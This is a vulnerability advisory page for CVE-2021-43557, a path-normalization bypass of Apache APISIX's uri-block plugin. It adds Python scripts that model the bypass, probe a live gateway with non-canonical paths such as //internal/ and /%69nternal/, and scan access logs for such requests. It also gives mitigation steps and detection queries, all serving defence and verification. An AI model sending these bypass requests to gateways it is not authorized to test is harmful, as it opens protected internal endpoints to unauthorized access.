CVE-2021-43557

7.5 HIGH

📋 TL;DR

CVE-2021-43557 is a URI normalization bypass in the uri-block plugin of Apache APISIX (enabled on routes under the plugin name uri-blocker). The plugin matched its block rules against $request_uri, the request URI exactly as the client sent it, which nginx does not normalize. APISIX matches routes on the normalized $uri, in which repeated slashes are merged, ./ and ../ segments are resolved and percent-encoded characters are decoded. A request for //internal/ therefore fails to match a rule such as ^/internal/ but is still routed to /internal/, so the block list is bypassed. Any other plugin, bundled or custom, that applies access rules to $request_uri has the same flaw. An unauthenticated attacker can reach endpoints the block list was meant to protect.

💻 Affected Systems

Products:
  • Apache APISIX
Versions: All versions before 2.10.2
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes, on every route where the plugin is enabled (plugins are not attached to routes by default)
Notes: Only deployments that use the uri-block plugin, or another plugin (bundled or custom) that applies access rules to $request_uri, are affected.
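The mechanism described above, as an added model in Python (not APISIX code, which is Lua). The block list, the probe URIs and the nginx_uri() approximation of nginx's $uri normalization are constructed for the example; it goes beyond the advisory's double-slash case to the other normalizations nginx applies before APISIX routes the request.

```python
"""Model of the CVE-2021-43557 check, added here as an illustration (not APISIX code).

nginx exposes two views of the request path: $request_uri is the raw request
line as sent by the client, $uri is normalized (repeated slashes merged,
'.'/'..' segments resolved, percent-encoding decoded, query string removed).
APISIX matches routes on the normalized form, so a plugin that applies block
rules to the raw form can be bypassed by any non-canonical spelling of a
blocked path.  nginx_uri() below is an approximation of nginx's normalization.
"""
import re
from urllib.parse import unquote

# Constructed block list in the plugin's regex style; "^/internal/" is the
# advisory's own example.
BLOCK_RULES = [r"^/internal/", r"^/admin"]


def nginx_uri(request_uri: str) -> str:
    """Approximate nginx's $uri for a raw $request_uri."""
    path = request_uri.split("?", 1)[0]        # $uri never carries the query string
    path = unquote(path)                        # %69 -> i, etc.
    segments = []
    for seg in path.split("/"):
        if seg in ("", "."):                    # "" comes from "//" (merge_slashes on)
            continue
        if seg == "..":
            if segments:
                segments.pop()
            continue
        segments.append(seg)
    trailing = path.endswith("/") or path.rsplit("/", 1)[-1] in (".", "..")
    return "/" + "/".join(segments) + ("/" if trailing and segments else "")


def blocked_vulnerable(request_uri: str, rules=BLOCK_RULES) -> bool:
    """Behaviour before 2.10.2: rules are matched against the raw $request_uri."""
    return any(re.search(rule, request_uri) for rule in rules)


def blocked_fixed(request_uri: str, rules=BLOCK_RULES) -> bool:
    """Hardened check: match against the normalized path the router will use."""
    return any(re.search(rule, nginx_uri(request_uri)) for rule in rules)


def find_bypasses(candidates, rules=BLOCK_RULES):
    """URIs that reach a blocked path (normalized match) yet pass the raw check."""
    return [u for u in candidates
            if blocked_fixed(u, rules) and not blocked_vulnerable(u, rules)]


# Constructed probes: the advisory's double-slash case plus the other
# normalizations nginx applies to $uri.
CANDIDATES = [
    "/internal/secret",            # canonical: blocked by both checks
    "//internal/secret",           # advisory example
    "/./internal/secret",
    "/public/../internal/secret",
    "/%69nternal/secret?x=1",      # percent-encoded 'i', plus a query string
]

if __name__ == "__main__":
    for uri in CANDIDATES:
        print(f"{uri:30} -> {nginx_uri(uri):18} raw-blocked={blocked_vulnerable(uri)!s:5} "
              f"normalized-blocked={blocked_fixed(uri)}")
    print("bypasses:", find_bypasses(CANDIDATES))
```

Every candidate except the canonical one reaches /internal/secret after normalization while slipping past the raw-URI check; the hardened variant normalizes first, which is what matching on $uri instead of $request_uri achieves in a real plugin.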

📦 What is this software?

Apache APISIX is an open-source, cloud-native API gateway maintained by the Apache Software Foundation. It runs on Nginx and OpenResty; its request-processing plugins, uri-block among them, are written in Lua, execute inside the Nginx workers and read request data through Nginx variables such as $uri and $request_uri.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete bypass of security controls allowing unauthorized access to internal/admin endpoints, potentially leading to data exposure, privilege escalation, or further attacks.

🟠

Likely Case

Partial bypass of URI-based access controls allowing access to some restricted endpoints that should be blocked by the uri-block plugin.

🟢

If Mitigated

Limited impact with proper network segmentation and additional authentication layers preventing full exploitation.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation needs nothing beyond the ability to send HTTP requests and a guess at which paths are blocked; the advisory's own example (//internal/ against a ^/internal/ rule) is effectively the proof of concept.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 2.10.2

Vendor Advisory: https://lists.apache.org/thread/18jyd458ptocr31rnkjs71w4h366mv7h

Restart Required: Yes

Instructions:

1. Upgrade Apache APISIX to version 2.10.2 or later.
2. Restart the APISIX service.
3. Verify the fix by requesting a blocked path in canonical and non-canonical form (for example /internal/ and //internal/); both must be rejected.

🔧 Temporary Workarounds

Custom URI Normalization (platform: all)

Match block rules against nginx's normalized $uri (ctx.var.uri in an APISIX plugin) instead of the raw $request_uri, or normalize the URI before matching. Collapsing repeated slashes alone is not sufficient: the raw URI may also contain ./ and ../ segments, percent-encoded characters and the query string. If you do normalize by hand, note that ngx.re.sub replaces only the first match; use ngx.re.gsub to collapse every run of slashes:

local normalized_uri = ngx.re.gsub(uri, "//+", "/")

WAF Rule (platform: all)

Deploy WAF rules that flag or block request paths containing repeated slashes, ./ or ../ segments, or percent-encoded characters, scoped to the paths the block list protects. A bare // also shows up in benign traffic (concatenated asset paths, for instance), so an unscoped rule will be noisy.

🧯 If You Can't Patch

  • Disable the uri-block plugin and enforce the restriction by other means: do not publish the internal route on the public listener, or require authentication on it with an authentication plugin
  • Use network-level controls (firewall rules, allow-lists at the edge) so that only trusted hosts can reach the potentially vulnerable endpoints

🔍 How to Verify

Check if Vulnerable:

Configure a uri-block rule such as ^/internal/ on a route, request /internal/ (expect the rejected code, 403 by default), then request //internal/. Any response other than the rejected code means the block list is bypassed; ./ and ../ segments and percent-encoded characters are worth trying as well.

Check Version:

apisix version

Verify Fix Applied:

After patching, repeat the same requests; the canonical path and every non-canonical spelling of it must all return the rejected code.
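The check above as an added probe script (not from the page or the APISIX project). It uses the standard-library http.client so the request line is sent exactly as written; higher-level clients may normalize the path before sending. The target host, port 9080 (APISIX's default HTTP listener), the path /internal/ and the rejected code 403 (uri-block's default unless rejected_code is set) are assumptions; run it only against a gateway you are authorized to test.

```python
"""Live check for CVE-2021-43557 against a gateway you are authorized to test.

Added example, not from the page or the APISIX project.  It sends the
canonical blocked path and several non-canonical spellings of it and reports
whether any spelling gets through.  Host, port, path and rejected code are
assumptions (see the command-line defaults below).
"""
import http.client
import sys

REJECTED_CODE = 403          # uri-block default; adjust if rejected_code is configured


def variants(path: str) -> list:
    """Non-canonical spellings that nginx's $uri normalizes back to `path`."""
    if not path.startswith("/") or len(path) < 2:
        raise ValueError("expected an absolute path such as /internal/")
    return [
        "/" + path,                                   # //internal/   (advisory example)
        "/." + path,                                  # /./internal/
        "/x/.." + path,                               # /x/../internal/
        "/%{:02X}{}".format(ord(path[1]), path[2:]),  # /%69nternal/  (percent-encoded 'i')
    ]


def probe(host: str, path: str, port: int = 9080, tls: bool = False,
          timeout: float = 5.0) -> dict:
    """GET the canonical path and each variant; return {request_uri: status}."""
    conn_cls = http.client.HTTPSConnection if tls else http.client.HTTPConnection
    results = {}
    for uri in [path] + variants(path):
        conn = conn_cls(host, port, timeout=timeout)
        try:
            conn.request("GET", uri)                  # sent verbatim, no normalization
            results[uri] = conn.getresponse().status
        finally:
            conn.close()
    return results


def is_bypassed(results: dict, canonical: str, rejected: int = REJECTED_CODE) -> bool:
    """Vulnerable if the canonical path is rejected but some variant is not."""
    return results.get(canonical) == rejected and any(
        status != rejected for uri, status in results.items() if uri != canonical
    )


if __name__ == "__main__":
    # Usage: python probe.py <host> <blocked-path>   (defaults are assumptions)
    host, blocked = (sys.argv[1], sys.argv[2]) if len(sys.argv) > 2 else ("127.0.0.1", "/internal/")
    res = probe(host, blocked)
    for uri, status in res.items():
        print(f"{status}  {uri}")
    print("VULNERABLE: block list bypassed" if is_bypassed(res, blocked) else "block list holds")
```

If the canonical path is not rejected at all, is_bypassed() returns False by design: that means the rule is not in effect on the route, which is a configuration problem rather than evidence about this CVE.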

📡 Detection & Monitoring

Log Indicators:

  • Requests whose raw request line contains //, /./, /../ or percent-encoded characters in the path, where the decoded path is one the block list protects
  • Successful (2xx) responses to such requests, especially alongside 403s for the same path in canonical form

Make sure the access log records the raw request line ($request, as in the default combined format) or $request_uri; $uri is already normalized and would hide the spelling the attacker actually sent.

Network Indicators:

  • Non-canonical URI spellings in HTTP traffic to the gateway
  • Requests reaching upstreams on endpoints that should be blocked

SIEM Query (pseudo-query; replace restricted_patterns with the paths from your block list):

http.uri contains "//" AND (http.uri contains "internal" OR http.uri contains restricted_patterns)

Extend the first clause to /./, /../ and percent-encoding as well, and decode the URI before the keyword match where the platform allows it; a bare // also appears in benign traffic, so scope the query to protected paths.
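The log triage described above, as an added example (not part of the page or of APISIX). The log lines are constructed in nginx combined format, and the restricted prefixes mirror a hypothetical block list; the script flags non-canonical raw paths whose decoded form names a protected path, which is the SIEM query above with decoding added.

```python
"""Triage of access-log lines for CVE-2021-43557-style bypass attempts.

Added example, not part of the page or of APISIX.  It parses nginx 'combined'
format lines (the default format records the raw request line, so the
un-normalized URI the client sent is visible), flags requests whose raw path
is non-canonical, and reports those whose decoded path names a restricted
prefix.  A 2xx on such a line is the strongest signal: the canonical form of
the same path should have been rejected.
"""
import re
from urllib.parse import unquote

# Constructed sample log; the 403 on the canonical /internal/admin beside a 200
# on //internal/admin is the pattern a successful bypass leaves behind.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Nov/2021:10:01:02 +0000] "GET /internal/admin HTTP/1.1" 403 162 "-" "curl/7.79.1"
10.0.0.5 - - [12/Nov/2021:10:01:03 +0000] "GET //internal/admin HTTP/1.1" 200 512 "-" "curl/7.79.1"
10.0.0.9 - - [12/Nov/2021:10:02:10 +0000] "GET /static//app.js HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
10.0.0.7 - - [12/Nov/2021:10:03:44 +0000] "GET /%69nternal/users?page=2 HTTP/1.1" 200 2048 "-" "python-requests/2.26.0"
10.0.0.7 - - [12/Nov/2021:10:03:45 +0000] "GET /public/../internal/users HTTP/1.1" 200 2048 "-" "python-requests/2.26.0"
10.0.0.9 - - [12/Nov/2021:10:04:00 +0000] "GET /healthz HTTP/1.1" 200 2 "-" "kube-probe/1.22"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# Spellings nginx normalizes away before routing but a raw-URI check sees verbatim.
NON_CANONICAL = re.compile(r"//|/\./|/\.\./|%[0-9A-Fa-f]{2}")
# Constructed: mirror of the block list the gateway is supposed to enforce.
RESTRICTED_PREFIXES = ("/internal/", "/admin")


def is_suspicious(uri: str, restricted=RESTRICTED_PREFIXES) -> bool:
    """Raw URI is non-canonical and, once decoded, names a restricted path."""
    if not NON_CANONICAL.search(uri):
        return False
    decoded = unquote(uri.split("?", 1)[0])
    return any(prefix.lstrip("/") in decoded for prefix in restricted)


def scan(log_text: str) -> list:
    """Return (ip, raw_uri, status) for every suspicious request in the log."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_suspicious(m["uri"]):
            hits.append((m["ip"], m["uri"], int(m["status"])))
    return hits


if __name__ == "__main__":
    for ip, uri, status in scan(SAMPLE_LOG):
        verdict = "BYPASS SUCCEEDED" if status < 400 else "blocked"
        print(f"{ip:10} {status} {uri:30} {verdict}")
```

The benign /static//app.js line is not reported because its decoded path names nothing the block list protects; that scoping is what keeps the rule usable on real traffic, where doubled slashes in asset paths are common.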

🔗 References

  • Vendor advisory: https://lists.apache.org/thread/18jyd458ptocr31rnkjs71w4h366mv7h
  • NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2021-43557
